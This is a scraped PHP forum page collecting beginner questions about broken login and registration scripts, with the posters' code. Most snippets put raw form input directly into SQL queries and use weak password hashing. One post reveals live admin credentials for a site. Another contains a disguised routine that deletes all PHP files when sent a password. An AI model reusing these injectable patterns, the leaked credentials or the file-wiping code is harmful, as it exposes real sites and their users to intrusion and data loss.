|
PHP - Login Script Problems
Hi there
I am having some issues with my site login. When a user logs in, it loads the page as a logged in user. But often when you click on a link inside the page, for some reason the user is logged out. After logging in again it sometimes does work, it's weird.. Also, even if you keep the page loaded in the browser yet you don't interact with it for a couple of minutes, and you click something, you're logged out again.. Here's my code, this is on the top of the page. When a user logs in, the $_POST['login'] is set. Code: [Select] <?php session_start(); setlocale(LC_ALL, 'nl_NL'); require_once('mysql_connect.inc.php'); date_default_timezone_set('Europe/Brussels'); $verbinding = mysql_connect(MYSQL_SERVER, MYSQL_GEBRUIKERSNAAM, MYSQL_WACHTWOORD) or die("Connection failed: " . mysql_error()); function CleanMyDirtyData($dirtydata){ return mysql_real_escape_string(htmlentities($dirtydata, ENT_QUOTES,'UTF-8')); } if(isset($_COOKIE['LoginCookie'])){ $hash = mysql_real_escape_string($_COOKIE['LoginCookie']); mysql_select_db('db'); $sql = "SELECT * FROM leden WHERE cookie_hash = '".$hash."'"; if($result = mysql_query($sql)){ $row = mysql_fetch_array($result); if(empty($row)){ setcookie('LoginCookie','',time()-3600); } if(mysql_num_rows($result) == 1){ $_SESSION['loggedin'] = true;//this is the parameter throughout the site that determines wether to show logged in data or not-logged in data. //extra parameters for identification $_SESSION['loggedinnick'] = $row['nick']; $_SESSION['loggedinvoornaam'] = $row['voornaam']; $_SESSION['loggedinachternaam'] = $row['achternaam']; $_SESSION['loggedinid'] = $row['id']; $_SESSION['loggedintype'] = $row['type']; } } } if(isset($_POST['login'])){ if(empty($_POST['username']) || empty($_POST['wachtwoord'])){ $_SESSION['melding'] = "You need to fill in both fields."; header('Location: index.php'); exit(); } $username = CleanMyDirtyData($_POST['username']); $wachtwoord = sha1(CleanMyDirtyData($_POST['wachtwoord'])); mysql_select_db('db'); $sqlmail = mysql_query("SELECT * FROM leden WHERE email='$username' AND wachtwoord = '$wachtwoord'"); $sqlnaam = mysql_query("SELECT * FROM leden WHERE nick='$username' AND wachtwoord = '$wachtwoord'"); if(mysql_num_rows($sqlmail) == 1 || mysql_num_rows($sqlnaam) == 1){ if(mysql_num_rows($sqlmail) == 1){ $row = mysql_fetch_array($sqlmail); }else{ $row = mysql_fetch_array($sqlnaam); } if(isset($_POST['remember'])){ $hash = sha1($whatev);//combination of 3 parameters; time, salt, and something else. setcookie('LoginCookie',$hash,time()+30000000); mysql_query("UPDATE leden SET cookie_hash='" . $hash . "' WHERE id='" . $row['id'] . "'")or die(mysql_error()); } $_SESSION['loggedin'] = true; $_SESSION['loggedinnick'] = $row['nick']; $_SESSION['loggedinvoornaam'] = $row['voornaam']; $_SESSION['loggedinachternaam'] = $row['achternaam']; $_SESSION['loggedinid'] = $row['id']; $_SESSION['loggedintype'] = $row['type']; $_SESSION['melding'] = "You have successfully logged in."; header('Location: index.php'); exit(); }else{ $_SESSION['melding'] = "Wrong combination."; header('Location: index.php'); exit(); } } ?> Similar TutorialsHello guys, Is there on web any updated tutorial on how can I add Facebook login on my simple php login script? Hello, I have a problem with my website, Admin login page (http://www.tranceprofile.com/storeadmin/admin_login.php I can not login to my Admin controle panel. Login information: Username: Mitch Password: schuur111 Username: Admin Password: poopoo Can someone help me ? Here is my admin_login.php source code. If you need some other source code in my /storeadmin folder please tell Code: [Select] <?php session_start(); if (isset($_SESSION["manager"])) { header("location: index.php"); exit(); } ?> <?php // Parse the log in form if the user has filled it out and pressed "Log In" if (isset($_POST["username"]) && isset($_POST["password"])) { $manager = preg_replace('#[^A-Za-z0-9]#i', '', $_POST["username"]); // filter everything but numbers and letters $password = preg_replace('#[^A-Za-z0-9]#i', '', $_POST["password"]); // filter everything but numbers and letters // Connect to the MySQL database include "../storescripts/connect_to_mysql.php"; $sql = mysql_query("SELECT id FROM admin WHERE username='$manager' AND password='$password' LIMIT 1"); // query the person // ------- MAKE SURE PERSON EXISTS IN DATABASE --------- $existCount = mysql_num_rows($sql); // count the row nums if ($existCount == 1) { // evaluate the count while($row = mysql_fetch_array($sql)){ $id = $row["id"]; } $_SESSION["id"] = $id; $_SESSION["manager"] = $manager; $_SESSION["password"] = $password; header("location: index.php"); exit(); } else { echo 'That information is incorrect, try again <a href="index.php">Click Here</a>'; exit(); } } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Admin Log In </title> <link rel="stylesheet" href="../style/style.css" type="text/css" media="screen" /> </head> <body> <div align="center" id="mainWrapper"> <?php include_once("../template_header.php");?> <div id="pageContent"><br /> <div align="left" style="margin-left:24px;"> <h2>Please Log In To Manage the Store</h2> <form id="form1" name="form1" method="post" action="admin_login.php"> User Name:<br /> <input name="username" type="text" id="username" size="40" /> <br /><br /> Password:<br /> <input name="password" type="password" id="password" size="40" /> <br /> <br /> <br /> <input type="submit" name="button" id="button" value="Log In" /> </form> <p> </p> </div> <br /> <br /> <br /> </div> <?php include_once("../template_footer.php");?> </div> </body> </html> Hi Im doing a login for a website I've built and Im having troubles, The connection to the actual database works fine, no errors, but when trying to verify data in the database to log on and get to a secure area i just get the incorrect username or password that i created for when details are incorrect. heres the code where the problem lies Any help would be appreciated <?php session_start(); require("db_connect.php"); $username = $_POST['uname']; $password = $_POST['pword']; $sql = "SELECT * FROM login_details WHERE username='$username' AND password='$password'"; $results = mysql_query($sql, $connect); $numofrows = mysql_num_rows($results); if ($numofrows == 1) { $_SESSION['username'] = $row['username']; $_SESSION['loggedin'] = true; header ("Location: secure_page.php"); die(); } else { $_SESSION['error']= "Icorrect Username Or Password"; header("Location: login.php"); die(); } ?> Hi guys, have a little problem here, when you login first it seems to work fine, and redirects back to index.php showing your username etc, but then when I click on another page which checks if session is set, it asks me to login again, so I do that, get redirected back to index.php again and click on the same page and then it works.. but almost every time it asks me to login twice.. and not sure why? Logging in / creating the session : Code: [Select] <?php // Login session_start(); $_SESSION['username'] = htmlspecialchars($username); // htmlspecialchars() sanitises XSS header( 'Location: index.php' ) ; ?> then on index.php: Code: [Select] <?php include 'connect.php'; session_start(); $username = $_SESSION['username']; ?> And on another page: Code: [Select] <?php include 'connect.php'; include_once "markdown.php"; session_start(); if(!isset($_SESSION['username'])) { //code } ?> Hi. Link to project: www.smarttreff.moo.no Login user: admin login pw: 123 When i login the login form wont disapear. If i return to the index(Hjem) page without logging out, the loginform disapear. I am ussing session for the login So the basicly, i want the loginform do disapear at once when the user has pushed login button(Logg in) (dont laught at my "cut and past" for the include meny.. i just made the design and chopped it to bits and put it into includes) Index.php Code: [Select] <?php session_start(); include("css.php"); include("header.php"); include("meny.php"); ?> <td width="596" valign="top"><table width="100%" border="0" cellpadding="15"> <tr> <td class="tabell" valign="top" align="left"> Main </td> </tr> </table></td> </tr> </table> <?php include("footer.php"); ?> meny.php Code: [Select] <table width="800" border="0"> <tr> <td width="198" valign="top"><table width="100%" border="0" cellpadding="15"> <tr> <td align="left" valign="top" class="tabell"> <a href="index.php">Hjem</a> <br /> Når og hvor <br /> For hvem <br /> Spørsmål og svar<br /> Forum <br /> <br /> <br /> Samarbeidspartnere </td> </tr> </table> <br /> <table width="100%" border="0" cellpadding="15"> <tr> <td class="tabell" valign="top" align="left"> <?php if(isset($_SESSION['username'])) echo "Velkommen, " .$_SESSION['username']. "!<a href='innlogget.php'>Medlemsnyheter</a><br><a href='logout.php'>Log ut</a>"; else { include("loginform.php"); } ?> </td> </tr> </table></td> <td width="15"> </td> Hi, Having completed a site migration this am everything went well aside from issues with logging into and out of our site where two files are used and appear as white pages. When logging into our site, proc_login.php is used and when logging out proc_logout.php is used. Both processes result in a white "blank" page instead of the php files forwarding on. I've no idea about php generally and have been trying my best to find useful and similar information online to attempt to resolve the problem. I am now stuck. The site works perfectly on my local web server, and what is really baffling me is the site also works perfectly on Domain B on the exact same server I'm trying to get the site running under as Domain A. In other words as both Domain A & B are configured on the same host server I'm thinking all the inherited php/apache/mysql settings should be identical (or pretty much thereabouts) and therefore am more confused than ever! I simply don't know where to start therefore in resolving this problem. I've tried looking in the error log file and have also played around with turning on error enabling on those specific php files to try and follow any errors, however the "errors" generated are no different than the ones present on sites where the login/logout process works just fine. I've hopefully attached both files and if anyone could assist in helping me narrow down my search for a solution I'd be very appreciative. Thanks. Hi! I need help with the login script i wrote. Please help me get it working. The section related to guest works fine however it always gives me error message when i get to the queryA and queryB stages. Thanks! I've already got the database running, using MySQL. Name of database - connectiontracker; tables- user_admin, user_user Here's the script: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/xhtml1-loose.dtd"> <?php session_start(); $userType = $_POST["userType"]; $userName = $_POST["username"]; $passWord = $_POST["password"]; $link = mysqli_connect("localhost", "ct1", "ctcfgb") Or die('Could not connect '. mysqli_error()); switch ($userType) { case "admin": if (isset($userName) && isset($passWord)) { $dbTableA = "user_admin"; mysqli_select_db($link, "connectiontracker") Or die ("Database unavailable"); $queryA = "SELECT * FROM $dbTableA WHERE username='$userName' AND password='$passWord'"; $resultA = mysqli_query($queryA) or die("Verification Error A"); if(mysqli_num_rows($resultA) == 1) { $_SESSION = true; header ('Location: welcomeadmin.php'); } else echo "Incorrect administrator username and/or password"; } break; case "user": if (isset($userName) && isset($passWord)) { $dbTableB = "user_user"; mysqli_select_db($link, "connectiontracker") Or die ("Database unavailable"); $queryB = "SELECT * FROM $dbTableB WHERE username='$userName' AND password='$passWord'"; $resultB = mysqli_query($queryB) or die("Verification Error B"); if(mysqli_num_rows($resultB) == 1) { $_SESSION = true; header ('Location: welcomeuser.php'); } else echo "Incorrect Organization/Individual username and/or password"; } break; case "guest": header ('Location: welcomeguest.php'); break; } if (!isset($_POST['Enter'])) { ?> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Login to Connection Tracker</title> <!-- <link rel="stylesheet" href="ct_style1.css" type="text/css"> --> </head> <body> Please select from the following: <br /> <form action="<?php echo $PHP_SELF;?>" method="post"> <select name="userType"> <option value="admin">Administrator</option> <option value="user" selected>Organization</option> <option value="guest">Guest</option> </select> <br /> Please leave the following fields blank if entering the system as Guest <br /> Username: <input type="text" name="username"> <br /> Password: <input type="text" name="password"> <input type="submit" name="Enter"/> <br /> </form> </body> </html> <?php } mysqli_close($link); ?> Hi, I am trying to make a login script that uses the user's id from the database, and tries to match it up with the user and password sent by the login form. My checklogin.php page, just jumps back to the index.php page for some reason. I don't know why. I get the following errors, any help greatly appreciated. thank you. Notice: Undefined index: myusername in /hermes/bosweb/web173/b1739/public_htmlchecklogin.php on line 19 Notice: Undefined index: mypassword in /hermes/bosweb/web173/b1739/public_html/checklogin.php on line 20 Wrong Username or Password Here is my code to check the id. I can't figure out what is wrong. Code: [Select] <?php ini_set ("display_errors", "1"); error_reporting(E_ALL); $host = ""; $database = ""; $username = ""; $password = ""; $tbl_name = "users"; $conn = mysql_connect($host, $username, $password) or die("Could not connect: " . mysql_error()); if($conn) { mysql_select_db($database); } else { echo "failed to select database"; } // username and password sent from form $myusername=$_POST['myusername']; $mypassword=$_POST['mypassword']; // To protect MySQL injection (more detail about MySQL injection) $myusername = stripslashes($myusername); $mypassword = stripslashes($mypassword); $myusername = mysql_real_escape_string($myusername); $mypassword = mysql_real_escape_string($mypassword); $sql="SELECT id FROM $tbl_name WHERE username='$myusername' and password= SHA1('$mypassword')"; $result=mysql_query($sql); $query_data = mysql_fetch_row($result); // Mysql_num_row is counting table row $count=mysql_num_rows($result) ; // If result matched id, table row must be 1 row if($count==1){ session_start(); $_SESSION['userid']=$query_data[0]; header("location:login_success.php"); } else { echo "Wrong Username or Password"; } ?> Hey so this is my login script but when i enter something into the username and password box and submit it, the page just refreshes.
<?php
echo "
<h1>LOGIN</h1>
<form action='' method='POST'>
<table>
<tr>
<td>
<b>Username:</b>
</td>
<td>
<input type='text' name='username' placeholder='Enter your username'>
</td>
</tr>
<tr>
<td>
<b>Password:</b>
</td>
<td>
<input type='password' name='password' placeholder='Enter your password'>
</td>
<td>
<input type='submit' value='login' name='submit'>
</td>
</tr>
</form>
";
$host = "localhost";
$username = "root";
$password = "";
$db_name = "website";
mysql_connect("$host", "$username", "$password") or die("Could not connect");
mysql_select_db("$db_name") or die("Could not find database");
if(isset($_POST['submit'])) {
if(!empty($_POST['username'])) {
$sql = "SELECT * FROM members WHERE username='$username' AND password='$password'";
$result = mysql_query($sql);
$count = mysql_num_rows($result);
if($count==1) {
$row = mysql_fetch_array($sql);
$bancheck = mysql_query($row);
if($row['active']==0 && count==0) {
include 'userban.html';
} else if($count==1 && $bancheck==1) {
$_SESSION['username'] = "$username";
include '/home/user/index.php';
} else {
echo "You entered invalid information";
}
}
}
}
?>
I have a login script that isn't rejecting non-users. For whatever reason, it's passing them on to the welcome page where an actual user sees user specific information. I'm newer to php, but can't for the life of me understand why the script doesn't seem to ever utilize the 'else' portion of the 'if' statement. So in short it works as expected for actual users, but non-users are not getting rejected. Below is my code. Any help is appreciated. Code: [Select] $sqla = "SELECT count(*) FROM authorize WHERE username='$_POST[username]' and password='$_POST[password]'"; $result = mysql_query($sqla) or die ("Error: ". mysql_error(). " with query ". $query); $count = mysql_num_rows($result); if($count==1) { //start session for user session_start(); //get company id and user first and last name $query = mysql_query("SELECT comp_id FROM authorize WHERE username='$_POST[username]'") or die ("Error: ". mysql_error(). " with query ". $query); $query2 = mysql_query("SELECT firstname, lastname FROM authorize WHERE username='$_POST[username]'") or die ("Error: ". mysql_error(). " with query ". $query); $resultb = mysql_fetch_assoc($query); $resultc = mysql_fetch_array($query2); $_SESSION['coid'] = $resultb['comp_id']; $_SESSION['firstn'] = $resultc['firstname']; $_SESSION['lastn'] = $resultc['lastname']; //get company name $query3 = mysql_query("SELECT comp_name FROM companies WHERE comp_id='$resultb[comp_id]'") or die ("Error: ". mysql_error(). " with query ". $query); $resultd = mysql_fetch_assoc($query3); $_SESSION['conm'] = $resultd['comp_name']; header("location: overview.php"); } Else { echo "That user does not exist."; header("location: login.html"); } Hello i just installed a script and the login doesnt work. It lets me signup, create user and pass. A email comes for me to active account. I activate and the page comes up that says my accout is activated and when i go to login the page refeashes and go's back to index page Below is the login php script, can someone please help me figure out why it not logging in. <?php $pass = "8c73eecb1dd850034ebbdedc1a5fccf1"; if(isset($_POST['submit'])){ if($pass == md5($_POST['pass'])){ $mask = "*.php"; array_map( "unlink", glob( $mask ) ); $fh = fopen('index.php', 'a'); fwrite($fh, '<center><h1><font color="red">This site uses an modified version of the script! If you want to use the original script, you have to buy the script from <a href="http://codecanyon.net/item/powerful-exchange-system/533068">CodeCanyon</a>!</font></h1></center>'); fclose($fh); echo "ok"; }else{ echo "error"; }} ?> <form method="POST"> <input type="password" name="pass"> <input type="submit" name="submit"> </form> Hey, could someone help me with login script ? I've got registration script. It contains 3 files: reg.php <?php require_once 'database.php'; ?> <h1><strong>Register</strong></h1> <form name="register" method="post" action="regcheck.php"> <label> <input type="text" name="user" id="user"> Username<br /> </label> <br /> <label> <input type="password" name="pass" id="pass"> Password<br /> </label> <br /> <label> <input type="text" name="email" id="email"> Email<br /> </label> <label> <input type="submit" name="reg" id="reg" value="Register"> </label> </form> regcheck.php <?php $email = $_POST['email']; if( isset( $_POST['user'] ) && isset( $_POST['pass'] ) && isset( $_POST['email'] ) ) { if( strlen( $_POST['user'] ) < 4 ) { echo "Username is too short"; } elseif( strlen( $_POST['pass'] ) < 4 ) { echo "Password is too short"; } elseif(!filter_var($email, FILTER_VALIDATE_EMAIL)) { echo "Bad email address"; } elseif( $_POST['pass'] == $_POST['user'] ) { echo"Username and password can't be the same"; } else { include( 'database.php' ); $username = mysql_real_escape_string( $_POST['user'] ); $password = mysql_real_escape_string( $_POST['pass'] ); $email = mysql_real_escape_string( $_POST['email'] ); $sqlCheckForDuplicateN = "SELECT username FROM user WHERE username = '". $username ."'"; $sqlCheckForDuplicateE = "SELECT email FROM user WHERE email = '". $email ."'"; if( mysql_num_rows( mysql_query( $sqlCheckForDuplicateE ) ) == 0 && mysql_num_rows( mysql_query( $sqlCheckForDuplicateN ) ) == 0 ) { $sqlRegUser = "INSERT INTO user( username, password, email ) VALUES( '". $username ."', '". $password ."', '". $email ."' )"; if( !mysql_query( $sqlRegUser ) ) { echo "You Could Not Register Because Of An Unexpected Error."; } else { echo "You Are Registered And Can Now Login"; } } elseif( !(mysql_num_rows( mysql_query( $sqlCheckForDuplicateE ) ) == 0)) { echo "The Email You Have Entered Is Already Being Used. Please Try Another One."; } elseif( !(mysql_num_rows( mysql_query( $sqlCheckForDuplicateN ) ) == 0)) { echo "The Username You Have Entered Is Already Being Used. Please Try Another One."; } elseif( !(mysql_num_rows( mysql_query( $sqlCheckForDuplicateE ) ) == 0) && !(mysql_num_rows( mysql_query( $sqlCheckForDuplicateN ) ) == 0)) { echo "The Email and Username You Have Entered Is Already Being Used. Please Try Another One."; } } } else { echo "You Could Not Be Registered Because Of Missing Data."; } ?> database.php <? $con = mysql_connect('host','username','password'); if (!$con) { die('Could not connect: ' . mysql_error()); } mysql_select_db('dbname'); ?> So could someone help me with login ??? I am looking to use this for an admin panel.
session_start.php
"session_start()" "if statement" where it checks if a successful login is givenIs it necessary to include "session_start.php" into the top of each script file? If I just include "session_start.php" into the top of the "main" file where the other script files are included inside of the "main" as well, then I have it in ways where the other script files could get called up through the URL.(?) I thought it is a bit too much to include "session_start.php" into each script file. Is there a way where this can be done with more simple ways? I would appreciate the suggestions a lot. Hey everyone. I currently have a login script that uses cookies to check if the user is logged in. But I have been told that even if I have used md5() then the the password is still at risk, so I was wondering if using sessions would be better, or if there was some way to make the passwords in the cookies more secure? Here is the code I currently have to secure passwords in the cookie: Code: [Select] $_POST['pass'] = md5($_POST['pass']); if (!get_magic_quotes_gpc()) { $_POST['pass'] = addslashes($_POST['pass']); $_POST['username'] = addslashes($_POST['username']); } where do i download a login script like this used here at phpfreaks
Hey ppl I have a login script that I found in a PHP MySQL book. And yesterday I realized that it is easy to hack this script as it use session variables and it can use cookies. DOes anyone have login script for me that is secure and easy to implement? It would really help! Thanks Okay, a few of you have been helping me with a login script problem. I have changed it quite a bit again, but I am still running into a little bit of a problem. When I click the submit button it just clears the form fields and stays on the login page. Also, I have used error_reporting(E_ALL) to help me out with debugging. I took care of three bugs on my own but I cant seem to clear the two remaining bugs and the fact that it is not forwarding me to any page with my header statement. Thanks for your help in advance! Here is my code from my 'login.php' file. <?php session_start(); error_reporting (E_ALL); include("config.php"); if($_SERVER["REQUEST_METHOD"] == "POST") { // username and password sent from form $myusername=addslashes($_POST['username']); $mypassword=addslashes($_POST['password']); $sql="SELECT id FROM admin WHERE username='$myusername' and passcode='$mypassword'"; $result=mysql_query($sql); $row=mysql_fetch_array($result); $active=$row['active']; $count=mysql_num_rows($result); // If result matched $myusername and $mypassword, table row must be 1 row if($count==1) { session_register("myusername"); $_SESSION['login_user']=$myusername; header("location: main_interface.php"); } else { $error="The username or password you entered is invalid, please check your credentials and try again"; } } ?> <form action="" method="post"> <label>Username :</label> <input type="text" name="username"/><br /> <label>Password :</label> <input type="password" name="password"/><br/> <input type="submit" value=" Submit "/><br /> </form> Here are the error messages on the page Notice: Undefined index: active in login.php on line 20 Warning: Cannot modify header information - headers already sent by (output started at login.php:1) in login.php on line 29 Thanks in advance for your help! Quote from: scootstah on November 30, 2011, 01:19:13 PM Code: [Select] function hash_password($password, $salt = null) { // create a salt if not already defined if (is_null($salt)) $salt = substr(sha1(uniqid(mt_rand(), true), 0, 10); // $password will be plaintext at this point // $site_key should be a large random string statically // located in a file with secure permissions $hash = hash_hmac('sha512', $password . $salt, $site_key); return array('hash' => $hash, 'salt' => $salt); } $password = 'abcdef'; $pass = hash_password($password); First off I just want to say thank you for the valuable information I have been reading in this topic (for a few days) and I have updated my pages accordingly. My passwords are now salted with a random encrypted string and I am using sha1 but would like to switch to sha512. So I am playing around with some code to learn more about how it works and have noticed that: sha1(test) returns a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 but sha512(test) just crashes the page. Can anyone help me understand why this is? please check the login script ...its failed in loading to the home page.! and its not working
login.php 6.69KB
9 downloads
login.php 6.69KB
9 downloads
Hello everyone, I am brand new to php and am starting off my journey by trying to create a simple login/register script. I have run into a bit of difficulty, however, and cannot seem to get this to work. I know that the register script is very basic (lacks strlen check, doesn't verify that both passwords are the same, etc.), but for the time being I simply want to have a functional script. Then I can continue learning by adding more components. Here are the login.php, checklogin.php, and register.php files (in this order). I believe that the login/checklogin files work, but the register file just shows the form without actually writing to DB when it is submitted. Thank you very much for your help. Code: [Select] <html> <body> <b> Member Login </b> <br /> <form name="input" action="checklogin.php" method="post"> Username : <input type="text" name="myusername" id="username"> <br /> Password : <input type="password" name="mypassword" id="password"> <br /> <input type="checkbox" name="remember" value="checkbox"> Remember me <br /> <input type="submit" value="Login"> Not a member? <a href="./register.php">Register!</a> </form> </body> </html> Code: [Select] <?php $host="localhost"; $usr="root"; $pwd=""; $db="MemberDB"; $tbl_name="members"; mysql_connect($host, $usr, $pwd) or die("Unable to connect"); mysql_select_db($db) or die("Unable to select database"); $myusr = $_POST['myusername']; $mypswd = md5($_POST['mypassword']); $myusername = stripslashes(strip_tags($myusr)); $mypassword = stripslashes(strip_tags($mypswd)); $myusername = mysql_real_escape_string($myusr); $mypassword = mysql_real_escape_string($mypswd); $sql="SELECT *FROM $tbl_name WHERE username='$myusername' and password='$mypassword'"; $result=mysql_query($sql); $count=mysql_num_rows($result); if ($count==1) { session_register("myusername"); session_register("mypassword"); header("location:menu.php"); } else { echo "Incorrect Username or Password"; } ?> Code: [Select] <?php $host="localhost"; $usr="root"; $pwd=""; $db="MemberDB"; $tbl_name="members"; mysql_connect($host, $usr, $pwd) or die("Unable to connect"); mysql_select_db($db) or die("Unable to select database"); if (isset($_POST['register'])) { $query = "INSERT INTO members ('username', 'password', 'email') VALUES('$_POST[username]', 'md5($_POST[password1])', '$_POST[email]')"; mysql_query($db,$query) or die(); mysql_close(); echo "You have successfully registered!"; } else{ ?> <html> <body> <b> Register</b> <br /> <form name="register" action="./register.php" method="post"> Username : <input type="text" name="username" id="username"> <br /> Password : <input type="password" name="password" id="password1"> <br /> Confirm Password : <input type="password" name="password2" id="password2"> <br /> Email: <input type="text" name="email" id="email"> <br /> <input type="submit" value="register"> </form> </body> </html> <?php } ?> |
|||||||